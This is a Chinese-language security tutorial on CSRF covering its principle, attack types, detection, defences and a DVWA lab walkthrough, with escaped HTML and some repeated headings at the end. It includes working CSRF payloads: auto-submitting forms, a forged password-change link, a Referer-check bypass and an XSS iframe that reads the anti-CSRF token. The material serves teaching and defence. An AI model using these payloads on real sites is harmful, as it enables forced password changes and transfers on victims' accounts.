CSRF漏洞原理与防御全面解析<\/h1>

0x00 CSRF漏洞概述<\/h2>
CSRF（Cross-site request forgery，跨站请求伪造）是一种基于客户端操作的请求伪造攻击，也被称为"One Click Attack"或Session Riding。<\/p>

CSRF与XSS的区别<\/h3>

XSS<\/strong>：利用用户对指定网站的信任<\/li>

CSRF<\/strong>：利用网站对用户浏览器的信任<\/li> <\/ul>
CSRF漏洞原理分类<\/h3>

狭义CSRF<\/strong>：攻击者将代码植入受害用户浏览器访问的页面，以"受害用户"身份向服务端发起伪造的HTTP请求<\/li>
广义CSRF<\/strong>：攻击者预测HTTP接口所有参数，以任意方式调用接口实现服务器CURD操作<\/li> <\/ol>
0x01 CSRF攻击流程<\/h2>

用户登录受信任网站A，服务器返回Cookie<\/li>
用户未退出网站A时，在同一浏览器访问恶意网站B<\/li>
网站B返回攻击代码，发起访问网站A的请求<\/li>
浏览器携带网站A的Cookie自动发送请求<\/li>
网站A以用户权限处理请求，执行恶意操作<\/li> <\/ol>
CSRF攻击必要条件<\/h3>

用户已登录受信任站点并生成有效Cookie<\/li>
用户在不登出的情况下访问恶意站点<\/li> <\/ol>
0x02 CSRF攻击类型<\/h2>
GET型CSRF<\/h3>
仅需一个HTTP请求即可构造攻击，常见于违反HTTP规范使用GET请求更新资源的场景。<\/p>
示例攻击流程<\/strong>：<\/p>
银行转账正常请求： http:\/\/www.nanhack.com\/payload\/xss\/csrf1.php?name=admin&money=10 恶意构造请求： http:\/\/www.nanhack.com\/payload\/xss\/csrf1.php?name=zsm&money=1000 <\/code><\/pre> GET型CSRF构造方式<\/strong>：<\/p> 链接利用（a标签）<\/li> iframe利用（设置display:none隐藏）<\/li> img标签利用（src属性自动请求）<\/li> CSS background利用（通过url加载远程内容）<\/li> <\/ol> POST型CSRF<\/h3> 危害小于GET型，通常使用自动提交表单实现。<\/p> 示例代码<\/strong>：<\/p> <form<\/span> name<\/span>=<\/span>"csrf"<\/span> action<\/span>=<\/span>"http:\/\/edu.xss.tv\/payload\/xss\/csrf2.php"<\/span> method<\/span>=<\/span>"post"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"name"<\/span> value<\/span>=<\/span>"zhangsan"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"money"<\/span> value<\/span>=<\/span>"1000"<\/span>> <\/span><\/span><\/form<\/span>> <\/span><\/span><script<\/span>>document.csrf<\/span>.submit<\/span>();<\/script<\/span>> <\/span><\/span><\/code><\/pre>0x03 CSRF漏洞探测<\/h2> 工具探测方法<\/h3> 使用CSRFTester或Burp Suite的CSRF POC功能<\/li> 设置浏览器代理（CSRFTester默认127.0.0.1:8008，Burp默认8080）<\/li> 登录Web应用并提交表单<\/li> 在工具中修改表单内容，验证是否可更改<\/li> 生成CSRF的POC<\/li> <\/ol> 0x04 CSRF漏洞防御<\/h2> Cookie Hash认证<\/strong>：设置和判断cookie时采用hash值认证<\/li> 使用POST请求<\/strong>：减少直接伪造请求的可能性<\/li> 验证HTTP Referer字段<\/strong>：检查请求来源<\/li> 自定义HTTP头属性<\/strong>：添加并验证自定义属性<\/li> Token验证<\/strong>：在请求地址中添加随机token并验证<\/li> 验证码机制<\/strong>：关键操作要求输入验证码<\/li> <\/ol> 0x05 DVWA靶场CSRF实战<\/h2> Low级别漏洞<\/h3> 漏洞代码分析<\/strong>：<\/p> if<\/span> (isset<\/span>($_GET['Change'<\/span>])) { <\/span><\/span> $pass_new =<\/span> $_GET['password_new'<\/span>]; <\/span><\/span> $pass_conf =<\/span> $_GET['password_conf'<\/span>]; <\/span><\/span> if<\/span> (($pass_new ==<\/span> $pass_conf)) { <\/span><\/span> $pass_new =<\/span> mysql_real_escape_string<\/span>($pass_new); <\/span><\/span> $pass_new =<\/span> md5<\/span>($pass_new); <\/span><\/span> $insert =<\/span> "UPDATE `users` SET password = '<\/span>$pass_new<\/span>' WHERE user = 'admin';"<\/span>; <\/span><\/span> \/\/ 执行SQL... <\/span><\/span><\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞利用方式<\/strong>：<\/p> 直接构造链接： http:\/\/192.168.1.3\/DVWA\/vulnerabilities\/csrf\/?password_new=qwzf&password_conf=qwzf&Change=Change# <\/code><\/pre> <\/li> 使用短网址隐藏真实URL<\/li> 构造攻击页面（利用img标签）： <\/span><\/span><\/code><\/pre><\/li> <\/ol> Medium级别漏洞<\/h3> 防御机制<\/strong>：<\/p> if<\/span> (eregi<\/span>($_SERVER['SERVER_NAME'<\/span>], $_SERVER['HTTP_REFERER'<\/span>])) <\/span><\/span><\/code><\/pre>检查Referer是否包含服务器名。<\/p> 绕过方法<\/strong>：<\/p> 将攻击页面命名为服务器名（如192.168.1.3.html）<\/li> 放置在攻击者服务器上诱导访问<\/li> <\/ol> High级别漏洞<\/h3> 防御机制<\/strong>：<\/p> checkToken<\/span>($_REQUEST['user_token'<\/span>], $_SESSION['session_token'<\/span>], 'index.php'<\/span>); <\/span><\/span><\/code><\/pre>使用随机token防御CSRF。<\/p> 绕过方法<\/strong>：<\/p> 结合XSS漏洞获取token： <iframe<\/span> src<\/span>=<\/span>"..\/csrf"<\/span> onload<\/span>=<\/span>alert(frames[0].document.getElementsByName('user_token')[0].value)<\/span>> <\/span><\/span><\/code><\/pre><\/li> 构造自动提交表单： <script<\/span>>function<\/span> attack<\/span>(){document.getElementById<\/span>("transfer"<\/span>).submit<\/span>();}<\/script<\/span>> <\/span><\/span><body<\/span> onload<\/span>=<\/span>"attack()"<\/span>> <\/span><\/span> <form<\/span> method<\/span>=<\/span>"GET"<\/span> id<\/span>=<\/span>"transfer"<\/span> action<\/span>=<\/span>"http:\/\/192.168.1.3\/dvwa\/vulnerabilities\/csrf"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"password_new"<\/span> value<\/span>=<\/span>"qwzf"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"password_conf"<\/span> value<\/span>=<\/span>"qwzf"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>'hidden'<\/span> name<\/span>=<\/span>'user_token'<\/span> value<\/span>=<\/span>"8519d07c0e08e8ef0461311e9a880af5"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"Change"<\/span> value<\/span>=<\/span>"Change"<\/span>> <\/span><\/span> <\/form<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 0x06 总结<\/h2> CSRF漏洞利用网站对用户浏览器的信任，通过伪造请求执行恶意操作。防御CSRF需要综合使用token验证、Referer检查、POST请求等多种机制。在实际开发中，应特别注意关键操作的防护，避免因设计不当导致安全漏洞。<\/p>

CSRF漏洞原理与防御全面解析<\/h1>

0x00 CSRF漏洞概述<\/h2> CSRF（Cross-site request forgery，跨站请求伪造）是一种基于客户端操作的请求伪造攻击，也被称为"One Click Attack"或Session Riding。<\/p>

0x02 CSRF攻击类型<\/h2>

0x03 CSRF漏洞探测<\/h2>

0x05 DVWA靶场CSRF实战<\/h2>

0x00 CSRF漏洞概述<\/h2>
CSRF（Cross-site request forgery，跨站请求伪造）是一种基于客户端操作的请求伪造攻击，也被称为"One Click Attack"或Session Riding。<\/p>